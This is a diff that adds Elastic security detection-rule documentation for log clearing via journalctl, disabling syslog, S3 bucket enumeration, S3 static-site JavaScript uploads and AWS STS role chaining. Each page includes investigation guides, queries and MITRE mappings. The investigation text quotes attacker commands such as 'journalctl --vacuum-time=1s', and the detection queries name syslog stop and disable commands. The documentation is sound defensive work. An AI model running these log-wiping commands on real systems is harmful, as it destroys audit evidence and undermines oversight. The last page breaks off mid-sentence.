diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-attempt-to-clear-logs-via-journalctl.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-attempt-to-clear-logs-via-journalctl.asciidoc new file mode 100644 index 0000000000..f423248684 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-attempt-to-clear-logs-via-journalctl.asciidoc @@ -0,0 +1,165 @@ +[[prebuilt-rule-8-19-8-attempt-to-clear-logs-via-journalctl]] +=== Attempt to Clear Logs via Journalctl + +This rule monitors for attempts to clear logs using the "journalctl" command on Linux systems. Adversaries may use this technique to cover their tracks by deleting or truncating log files, making it harder for defenders to investigate their activities. The rule looks for the execution of "journalctl" with arguments that indicate log clearing actions, such as "--vacuum-time", "--vacuum-size", or "--vacuum-files". + +*Rule type*: eql + +*Rule indices*: + +* auditbeat-* +* endgame-* +* logs-auditd_manager.auditd-* +* logs-crowdstrike.fdr* +* logs-endpoint.events.process* +* logs-sentinel_one_cloud_funnel.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Elastic Defend +* Data Source: Elastic Endgame +* Data Source: Auditd Manager +* Data Source: Crowdstrike +* Data Source: SentinelOne +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Attempt to Clear Logs via Journalctl* + + +This detection flags attempts to purge systemd journal logs by invoking journalctl with vacuum options, which attackers use to erase evidence and impede investigations. A common pattern is a compromised user escalating to root and immediately running sudo journalctl --vacuum-time=1s or --vacuum-size=1M, sometimes via a script or cron job, to rapidly truncate the journal across all boots and hide prior execution traces. + + +*Possible investigation steps* + + +- Enrich with user/UID, effective privileges, parent and command-line, session/TTY, and origin (SSH IP or local), and determine if execution came from a scheduled job (cron/systemd timer) or a script. +- Quantify destructiveness by extracting the exact vacuum parameter value(s) and immediately checking journal state (journalctl --disk-usage and --list-boots) and /var/log/journal size/mtime to see how much history was removed. +- Inspect configuration and persistence paths for intentional log suppression, including recent changes in /etc/systemd/journald.conf (Storage=volatile, SystemMaxUse, SystemMaxFileSize, MaxRetentionSec) and any new systemd units or scripts invoking journalctl vacuum. +- Correlate the vacuum timestamp with preceding activity to identify what might be concealed (privilege escalation, new accounts, sudoers edits, suspicious binaries), using auditd/EDR telemetry and shell history to rebuild the timeline. +- Verify remote log forwarding and SIEM ingestion for this host, compare gaps around the vacuum time, and recover pre-vacuum events from central storage to assess impact and intent. + + +*False positive analysis* + + +- A sysadmin or maintenance script ran journalctl --vacuum-time or --vacuum-size to reclaim space on a host under log disk pressure, which should correlate with low-free-space alerts, approved retention policy, and a scheduled systemd timer or cron job. +- OS provisioning or image-preparation steps vacuumed the journal with journalctl --vacuum-files to sanitize logs before snapshotting, typically a one-time root action occurring near installation and matching documented build procedures. + + +*Response and remediation* + + +- Immediately kill any active journalctl vacuum invocation (e.g., pkill -x journalctl), lock or remove sudo for the initiating user, and network-quarantine the host to prevent further tampering. +- Remove persistence by disabling systemd units/timers and cron jobs that call "journalctl --vacuum-*", inspecting /etc/systemd/system/* for ExecStart=journalctl vacuum and /etc/crontab, /etc/cron.*, and user crontabs, then deleting the offending scripts. +- Recover logging by setting Storage=persistent and policy-compliant SystemMaxUse/SystemMaxFileSize/MaxRetentionSec in /etc/systemd/journald.conf, restarting systemd-journald, and backfilling missing events from central log archives. +- Harden by enabling remote forwarding (ForwardToSyslog=yes and rsyslog/syslog-ng to SIEM), adding auditd rules to alert on "journalctl --vacuum-*", and tightening sudoers to require MFA and record command I/O for journalctl on critical hosts. +- Preserve evidence by archiving remaining /var/log/journal entries, journald.conf and its mtime, modified unit files under /etc/systemd/system, and shell/auth logs, and capture a disk snapshot before making further changes. +- Escalate to incident response if root executed "journalctl --vacuum-time/size/files" outside a documented maintenance window, if Storage=volatile was set or retention reduced below policy, or if the same actor performed vacuums on multiple hosts within 24 hours. + + +==== Setup + + + +*Setup* + + +This rule requires data coming in from Elastic Defend. + + +*Elastic Defend Integration Setup* + +Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app. + + +*Prerequisite Requirements:* + +- Fleet is required for Elastic Defend. +- To configure Fleet Server refer to the https://www.elastic.co/guide/en/fleet/current/fleet-server.html[documentation]. + + +*The following steps should be executed in order to add the Elastic Defend integration on a Linux System:* + +- Go to the Kibana home page and click "Add integrations". +- In the query bar, search for "Elastic Defend" and select the integration to see more details about it. +- Click "Add Elastic Defend". +- Configure the integration name and optionally add a description. +- Select the type of environment you want to protect, either "Traditional Endpoints" or "Cloud Workloads". +- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html[Helper guide]. +- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" +- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead. +For more details on Elastic Agent configuration settings, refer to the https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html[helper guide]. +- Click "Save and Continue". +- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts. +For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/security/current/install-endpoint.html[helper guide]. + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.type == "start" and +event.action in ("exec", "exec_event", "start", "ProcessRollup2", "executed", "process_started") and +process.name == "journalctl" and process.args like ("--vacuum-time=*", "--vacuum-size=*", "--vacuum-files=*") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Indicator Removal +** ID: T1070 +** Reference URL: https://attack.mitre.org/techniques/T1070/ +* Sub-technique: +** Name: Clear Linux or Mac System Logs +** ID: T1070.002 +** Reference URL: https://attack.mitre.org/techniques/T1070/002/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-attempt-to-disable-syslog-service.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-attempt-to-disable-syslog-service.asciidoc new file mode 100644 index 0000000000..5e568dd5f1 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-attempt-to-disable-syslog-service.asciidoc @@ -0,0 +1,182 @@ +[[prebuilt-rule-8-19-8-attempt-to-disable-syslog-service]] +=== Attempt to Disable Syslog Service + +Adversaries may attempt to disable the syslog service in an attempt to an attempt to disrupt event logging and evade detection by security controls. + +*Rule type*: eql + +*Rule indices*: + +* auditbeat-* +* endgame-* +* logs-crowdstrike.fdr* +* logs-endpoint.events.process* +* logs-sentinel_one_cloud_funnel.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/security-labs/detecting-log4j2-with-elastic-security + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Elastic Endgame +* Data Source: Elastic Defend +* Data Source: Crowdstrike +* Data Source: SentinelOne +* Resources: Investigation Guide + +*Version*: 215 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Attempt to Disable Syslog Service* + + +Syslog is a critical component in Linux environments, responsible for logging system events and activities. Adversaries may target syslog to disable logging, thereby evading detection and obscuring their malicious actions. The detection rule identifies attempts to stop or disable syslog services by monitoring specific process actions and arguments, flagging suspicious commands that could indicate an attempt to impair logging defenses. + + +*Possible investigation steps* + + +- Review the process details to identify the user account associated with the command execution, focusing on the process.name and process.args fields to determine if the action was legitimate or suspicious. +- Check the system's recent login history and user activity to identify any unauthorized access attempts or anomalies around the time the syslog service was targeted. +- Investigate the parent process of the flagged command to understand the context of its execution and determine if it was initiated by a legitimate application or script. +- Examine other logs and alerts from the same host around the time of the event to identify any correlated suspicious activities or patterns that might indicate a broader attack. +- Assess the system for any signs of compromise, such as unexpected changes in configuration files, unauthorized software installations, or unusual network connections, to determine if the attempt to disable syslog is part of a larger attack. + + +*False positive analysis* + + +- Routine maintenance activities may trigger this rule, such as scheduled service restarts or system updates. To manage this, create exceptions for known maintenance windows or specific administrative accounts performing these tasks. +- Automated scripts or configuration management tools like Ansible or Puppet might stop or disable syslog services as part of their operations. Identify these scripts and whitelist their execution paths or associated user accounts. +- Testing environments often simulate service disruptions, including syslog, for resilience testing. Exclude these environments from the rule or adjust the rule to ignore specific test-related processes. +- Some legitimate software installations or updates may require stopping syslog services temporarily. Monitor installation logs and exclude these processes if they are verified as non-threatening. +- In environments with multiple syslog implementations, ensure that the rule is not overly broad by refining the process arguments to match only the specific syslog services in use. + + +*Response and remediation* + + +- Immediately isolate the affected system from the network to prevent further malicious activity and potential lateral movement by the adversary. +- Terminate any suspicious processes identified in the alert, specifically those attempting to stop or disable syslog services, to restore normal logging functionality. +- Restart the syslog service on the affected system to ensure that logging is re-enabled and operational, using commands like `systemctl start syslog` or `service syslog start`. +- Conduct a thorough review of recent logs, if available, to identify any additional suspicious activities or indicators of compromise that may have occurred prior to the syslog service being disabled. +- Escalate the incident to the security operations team for further investigation and to determine if the attack is part of a larger campaign or if other systems are affected. +- Implement additional monitoring on the affected system and similar systems to detect any further attempts to disable logging services, using enhanced logging and alerting mechanisms. +- Review and update access controls and permissions to ensure that only authorized personnel have the ability to modify or stop critical services like syslog, reducing the risk of future incidents. + +==== Setup + + + +*Setup* + + +This rule requires data coming in from one of the following integrations: +- Elastic Defend +- Auditbeat + + +*Elastic Defend Integration Setup* + +Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app. + + +*Prerequisite Requirements:* + +- Fleet is required for Elastic Defend. +- To configure Fleet Server refer to the https://www.elastic.co/guide/en/fleet/current/fleet-server.html[documentation]. + + +*The following steps should be executed in order to add the Elastic Defend integration on a Linux System:* + +- Go to the Kibana home page and click "Add integrations". +- In the query bar, search for "Elastic Defend" and select the integration to see more details about it. +- Click "Add Elastic Defend". +- Configure the integration name and optionally add a description. +- Select the type of environment you want to protect, either "Traditional Endpoints" or "Cloud Workloads". +- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html[Helper guide]. +- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" +- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead. +For more details on Elastic Agent configuration settings, refer to the https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html[helper guide]. +- Click "Save and Continue". +- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts. +For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/security/current/install-endpoint.html[helper guide]. + + +*Auditbeat Setup* + +Auditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations. + + +*The following steps should be executed in order to add the Auditbeat on a Linux System:* + +- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages. +- To install the APT and YUM repositories follow the setup instructions in this https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html[helper guide]. +- To run Auditbeat on Docker follow the setup instructions in the https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html[helper guide]. +- To run Auditbeat on Kubernetes follow the setup instructions in the https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html[helper guide]. +- For complete “Setup and Run Auditbeat” information refer to the https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html[helper guide]. + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.action in ("exec", "exec_event", "start", "ProcessRollup2") and + ( (process.name == "service" and process.args == "stop") or + (process.name == "chkconfig" and process.args == "off") or + (process.name == "systemctl" and process.args in ("disable", "stop", "kill")) + ) and process.args in ("syslog", "rsyslog", "syslog-ng", "syslog.service", "rsyslog.service", "syslog-ng.service") and +not ( + process.parent.name == "rsyslog-rotate" or + process.args == "HUP" +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-aws-s3-bucket-enumeration-or-brute-force.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-aws-s3-bucket-enumeration-or-brute-force.asciidoc new file mode 100644 index 0000000000..b3d2e88c76 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-aws-s3-bucket-enumeration-or-brute-force.asciidoc @@ -0,0 +1,152 @@ +[[prebuilt-rule-8-19-8-aws-s3-bucket-enumeration-or-brute-force]] +=== AWS S3 Bucket Enumeration or Brute Force + +Identifies a high number of failed S3 operations against a single bucket from a single source address within a short timeframe. This activity can indicate attempts to collect bucket objects or cause an increase in billing to an account via internal "AccessDenied" errors. + +*Rule type*: threshold + +*Rule indices*: + +* logs-aws.cloudtrail-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-6m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://medium.com/@maciej.pocwierz/how-an-empty-s3-bucket-can-make-your-aws-bill-explode-934a383cb8b1 +* https://docs.aws.amazon.com/AmazonS3/latest/userguide/ErrorCodeBilling.html + +*Tags*: + +* Domain: Cloud +* Data Source: AWS +* Data Source: Amazon Web Services +* Data Source: AWS S3 +* Resources: Investigation Guide +* Use Case: Log Auditing +* Tactic: Impact +* Tactic: Discovery +* Tactic: Collection + +*Version*: 6 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating AWS S3 Bucket Enumeration or Brute Force* + + +This rule detects when many failed S3 operations (HTTP 403 AccessDenied) hit a single bucket from a single source address in a short window. This can indicate bucket name enumeration, object/key guessing, or brute-force style traffic intended to drive cost or probe for misconfigurations. 403 requests from outside the bucket owner’s account/organization are not billed, but 4XX from inside the owner’s account/org can still incur charges. Prioritize confirming who is making the calls and where they originate. + + +*Possible investigation steps* + + +- **Investigate in Timeline.** Investigate the alert in timeline (Take action -> Investigate in timeline) to retrieve and review all of the raw CloudTrail events that contributed to the threshold alert. Threshold alerts only display the grouped fields; Timeline provides a way to see individual event details such as request parameters, full error messages, and additional user context. +- **Confirm entity & target.** Note the rule’s threshold and window. Identify the target bucket (`tls.client.server_name`) and the source (`source.address`). Verify the caller identity details via any available `aws.cloudtrail.user_identity` fields. +- **Actor & session context.** In CloudTrail events, pivot 15–30 minutes around the spike for the same `source.address` or principal. Determine if the source is: + - **External** to your account/organization (recon/cost DDoS risk is lower for you due to 2024 billing change). + - **Internal** (same account/org)—higher cost risk and possible misuse of internal automation. +- **Bucket posture snapshot.** Record S3 Block Public Access, Bucket Policy, ACLs, and whether Versioning/Object Lock are enabled. Capture any recent `PutBucketPolicy`, `PutPublicAccessBlock`, `PutBucketVersioning`, or lifecycle changes. +- **Blast radius.** Check for similar spikes to other buckets/regions, or parallel spikes from the same source. Review any GuardDuty S3 findings and AWS Config drift related to the bucket or principal. +- **Business context.** Contact the bucket/app owner. Validate whether a migration, scanner, or broken job could legitimately cause bursts. + + +*False positive analysis* + + +- **Expected jobs / broken automation.** Data movers, posture scanners, or failed credentials can generate 403 storms. Validate with `userAgent`, ARNs, change windows, and environment (dev/stage vs prod). +- **External probing.** Internet-origin enumeration often looks like uniform 403s from transient or cloud-provider IPs and typically has no business impact and no billing if outside your account/org. Tune thresholds or allowlist known scanners if appropriate. + + +*Response and remediation* + + +**1. Immediate, low-risk actions** +- **Preserve evidence.** Export CloudTrail records (±30 minutes) for the bucket and source address into an evidence bucket with restricted access. +- **Notify owners.** Inform the bucket/application owner and security lead; confirm any maintenance windows. + +**2. Containment options** +- **External-origin spikes:** Verify Block Public Access is enforced and bucket policies are locked down. Optionally apply a temporary deny-all bucket policy allowing only IR/admin roles while scoping. +- **Internal-origin spikes:** Identify the principal. Rotate access keys for IAM users, or restrict involved roles (temporary deny/SCP, remove risky policies). Pause broken jobs/pipelines until validated. + +**3. Scope & hunting** +- Review Timeline and CloudTrail for related events: `PutBucketPolicy`, `PutPublicAccessBlock`, `PutBucketVersioning`, lifecycle changes, unusual `PutObject`/`DeleteObject` volumes, or cross-account access. +- Check GuardDuty S3 and Config drift findings for signs of tampering or lateral movement. + +**4. Recovery & hardening** +- If data impact suspected: with Versioning, restore known-good versions; otherwise, recover from backups/replicas. +- Enable Versioning on critical buckets going forward; evaluate Object Lock legal hold if enabled. +- Ensure Block Public Access, least-privilege IAM policies, CloudTrail data events for S3, and GuardDuty protections are consistently enforced. + + +*Additional information* + + +- https://docs.aws.amazon.com/AmazonS3/latest/userguide/ErrorCodeBilling.html[AWS S3 billing for error responses]: see latest AWS docs on which error codes are billed. +- https://aws.amazon.com/about-aws/whats-new/2024/05/amazon-s3-no-charge-http-error-codes/[AWS announcement (Aug 2024)]: 403s from outside the account/org are not billed. +- https://github.com/aws-samples/aws-incident-response-playbooks/[AWS IR Playbooks]: NIST-aligned template for evidence, containment, eradication, recovery, post-incident. +- https://github.com/aws-samples/aws-customer-playbook-framework/[AWS Customer Playbook Framework]: Practical response steps for account and bucket-level abuse. + + +==== Rule query + + +[source, js] +---------------------------------- + event.dataset: "aws.cloudtrail" and + event.provider : "s3.amazonaws.com" and + aws.cloudtrail.error_code : "AccessDenied" and + tls.client.server_name : * + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Impact +** ID: TA0040 +** Reference URL: https://attack.mitre.org/tactics/TA0040/ +* Technique: +** Name: Financial Theft +** ID: T1657 +** Reference URL: https://attack.mitre.org/techniques/T1657/ +* Tactic: +** Name: Discovery +** ID: TA0007 +** Reference URL: https://attack.mitre.org/tactics/TA0007/ +* Technique: +** Name: Cloud Storage Object Discovery +** ID: T1619 +** Reference URL: https://attack.mitre.org/techniques/T1619/ +* Tactic: +** Name: Collection +** ID: TA0009 +** Reference URL: https://attack.mitre.org/tactics/TA0009/ +* Technique: +** Name: Data from Cloud Storage +** ID: T1530 +** Reference URL: https://attack.mitre.org/techniques/T1530/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-aws-s3-static-site-javascript-file-uploaded.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-aws-s3-static-site-javascript-file-uploaded.asciidoc new file mode 100644 index 0000000000..4c9998d883 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-aws-s3-static-site-javascript-file-uploaded.asciidoc @@ -0,0 +1,151 @@ +[[prebuilt-rule-8-19-8-aws-s3-static-site-javascript-file-uploaded]] +=== AWS S3 Static Site JavaScript File Uploaded + +This rule detects when a JavaScript file is uploaded or accessed in an S3 static site directory (`static/js/`) by an IAM user or assumed role. This can indicate suspicious modification of web content hosted on S3, such as injecting malicious scripts into a static website frontend. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.sygnia.co/blog/sygnia-investigation-bybit-hack/ +* https://docs.aws.amazon.com/AmazonS3/latest/userguide/WebsiteHosting.html +* https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutObject.html + +*Tags*: + +* Domain: Cloud +* Data Source: AWS +* Data Source: Amazon Web Services +* Data Source: AWS S3 +* Tactic: Impact +* Use Case: Web Application Compromise +* Use Case: Cloud Threat Detection +* Resources: Investigation Guide + +*Version*: 3 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and Analysis* + + + +*Investigating AWS S3 Static Site JavaScript File Uploaded* + + +An S3 `PutObject` action that targets a path like `static/js/` and uploads a `.js` file is a potential signal for web content modification. If done by an unexpected IAM user or outside of CI/CD workflows, it may indicate a compromise. + + +*Possible Investigation Steps* + + +- **Identify the Source User**: Check `aws.cloudtrail.user_identity.arn`, access key ID, and session type (`IAMUser`, `AssumedRole`, etc). +- **Review File Content**: Use the S3 `GetObject` or CloudTrail `requestParameters` to inspect the uploaded file for signs of obfuscation or injection. +- **Correlate to Other Events**: Review events from the same IAM user before and after the upload (e.g., `ListBuckets`, `GetCallerIdentity`, IAM activity). +- **Look for Multiple Uploads**: Attackers may attempt to upload several files or modify multiple directories. + + +*False Positive Analysis* + + +- This behavior may be expected during app deployments. Look at: + - The `user_agent.original` to detect legitimate CI tools (like Terraform or GitHub Actions). + - Timing patterns—does this match a regular release window? + - The origin IP and device identity. + + +*Response and Remediation* + + +- **Revert Malicious Code**: Replace the uploaded JS file with a clean version and invalidate CloudFront cache if applicable. +- **Revoke Access**: If compromise is confirmed, revoke the IAM credentials and disable the user. +- **Audit IAM Policies**: Ensure that only deployment users can modify static site buckets. +- **Enable Bucket Versioning**: This can allow for quick rollback and historical review. + + +==== Rule query + + +[source, js] +---------------------------------- +from logs-aws.cloudtrail* metadata _id, _version, _index + +| where + // S3 object read/write activity + event.dataset == "aws.cloudtrail" + and event.provider == "s3.amazonaws.com" + and event.action in ("GetObject", "PutObject") + + // IAM users or assumed roles only + and aws.cloudtrail.user_identity.type in ("IAMUser", "AssumedRole") + + // Requests for static site bundles + and aws.cloudtrail.request_parameters like "*static/js/*.js*" + + // Exclude IaC and automation tools + and not ( + user_agent.original like "*Terraform*" + or user_agent.original like "*Ansible*" + or user_agent.original like "*Pulumni*" + ) + +// Extract fields from request parameters +| dissect aws.cloudtrail.request_parameters + "%{{?bucket.name.key}=%{Esql.aws_cloudtrail_request_parameters_bucket_name}, %{?host.key}=%{Esql_priv.aws_cloudtrail_request_parameters_host}, %{?bucket.object.location.key}=%{Esql.aws_cloudtrail_request_parameters_bucket_object_location}}" + +// Extract file name portion from full object path +| dissect Esql.aws_cloudtrail_request_parameters_bucket_object_location "%{}static/js/%{Esql.aws_cloudtrail_request_parameters_object_key}" + +// Match on JavaScript files +| where ends_with(Esql.aws_cloudtrail_request_parameters_object_key, ".js") + +// Retain relevant ECS and dissected fields +| keep + aws.cloudtrail.user_identity.arn, + aws.cloudtrail.user_identity.access_key_id, + aws.cloudtrail.user_identity.type, + aws.cloudtrail.request_parameters, + Esql.aws_cloudtrail_request_parameters_bucket_name, + Esql.aws_cloudtrail_request_parameters_object_key, + user_agent.original, + source.ip, + event.action, + @timestamp + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Impact +** ID: TA0040 +** Reference URL: https://attack.mitre.org/tactics/TA0040/ +* Technique: +** Name: Data Manipulation +** ID: T1565 +** Reference URL: https://attack.mitre.org/techniques/T1565/ +* Sub-technique: +** Name: Stored Data Manipulation +** ID: T1565.001 +** Reference URL: https://attack.mitre.org/techniques/T1565/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-aws-sts-role-chaining.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-aws-sts-role-chaining.asciidoc new file mode 100644 index 0000000000..e792541701 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-aws-sts-role-chaining.asciidoc @@ -0,0 +1,159 @@ +[[prebuilt-rule-8-19-8-aws-sts-role-chaining]] +=== AWS STS Role Chaining + +Identifies role chaining activity. Role chaining is when you use one assumed role to assume a second role through the AWS CLI or API. While this a recognized functionality in AWS, role chaining can be abused for privilege escalation if the subsequent assumed role provides additional privileges. Role chaining can also be used as a persistence mechanism as each AssumeRole action results in a refreshed session token with a 1 hour maximum duration. This is a new terms rule that looks for the first occurance of one role (aws.cloudtrail.user_identity.session_context.session_issuer.arn) assuming another (aws.cloudtrail.resources.arn). + +*Rule type*: new_terms + +*Rule indices*: + +* filebeat-* +* logs-aws.cloudtrail-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-6m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles.html#id_roles_terms-and-concepts +* https://www.uptycs.com/blog/detecting-anomalous-aws-sessions-temporary-credentials +* https://hackingthe.cloud/aws/post_exploitation/role-chain-juggling/ + +*Tags*: + +* Domain: Cloud +* Data Source: AWS +* Data Source: Amazon Web Services +* Data Source: AWS STS +* Use Case: Threat Detection +* Tactic: Persistence +* Tactic: Privilege Escalation +* Tactic: Lateral Movement +* Resources: Investigation Guide + +*Version*: 3 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating AWS STS Role Chaining* + + +Role chaining occurs when a role assumed with temporary credentials (`AssumeRole`) is used to assume another role. While supported by AWS, chaining can increase risk of Privilege escalation, if the second role grants broader permissions; and Persistence, since each chained AssumeRole refreshes the session with up to 1-hour duration. This new terms rule triggers on the first observed combination of one role (`aws.cloudtrail.user_identity.session_context.session_issuer.arn`) assuming another (`aws.cloudtrail.resources.arn`). + + +*Possible investigation steps* + + +- **Review Alert Context**: Investigate the alert, focusing on `aws.cloudtrail.user_identity.session_context.session_issuer.arn` (the calling role) and `aws.cloudtrail.resources.arn` (the target role). +- **Determine scope and intent.** Check `aws.cloudtrail.recipient_account_id` and `aws.cloudtrail.resources.account_id` fields to identify whether the chaining is Intra-account (within the same AWS account) or Cross-account (from another AWS account). +- **Check role privileges.** Compare policies of the calling and target roles. Determine if chaining increases permissions (for example, access to S3 data, IAM modifications, or admin privileges). +- **Correlate with other activity.** Look for related alerts or CloudTrail activity within ±30 minutes: policy changes, unusual S3 access, or use of sensitive APIs. Use `aws.cloudtrail.user_identity.arn` to track behavior from the same role session, use `aws.cloudtrail.user_identity.session_context.session_issuer.arn` to track broader behavior from the role itself. +- **Validate legitimacy.** Contact the account or service owner to confirm if the chaining was expected (for example, automation pipelines or federated access flows). +- **Geography & source.** Review `cloud.region`, `source.address`, and other `geo` fields to assess if the activity originates from expected regions or network ranges. + + +*False positive analysis* + + +- **Expected role chaining.** Some organizations use role chaining as part of multi-account access strategies. Maintain an allowlist of known `issuer.arn` - `target.arn` pairs. +- **Automation and scheduled tasks.** CI/CD systems or monitoring tools may assume roles frequently. Validate by `userAgent` and historical behavior. +- **Test/dev environments.** Development accounts may generate experimental chaining patterns. Tune rules or exceptions to exclude low-risk accounts. + + +*Response and remediation* + + +**1. Immediate steps** +- **Preserve evidence.** Export triggering CloudTrail events (±30 minutes) into a restricted evidence bucket. Include session context, source IP, and user agent. +- **Notify owners.** Contact the owners of both roles to validate intent. + +**2. Containment (if suspicious)** +- **Revoke temporary credentials.** https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_use_revoke-sessions.html[Revoke Session Permissions] if possible, or attach https://docs.aws.amazon.com/aws-managed-policy/latest/reference/AWSDenyAll.html[AWSDenyALL policy] to the originating role. +- **Restrict risky roles.** Apply least-privilege policies or temporarily deny `sts:AssumeRole` for suspicious principals. +- **Enable monitoring.** Ensure CloudTrail and GuardDuty are active in all regions to detect further 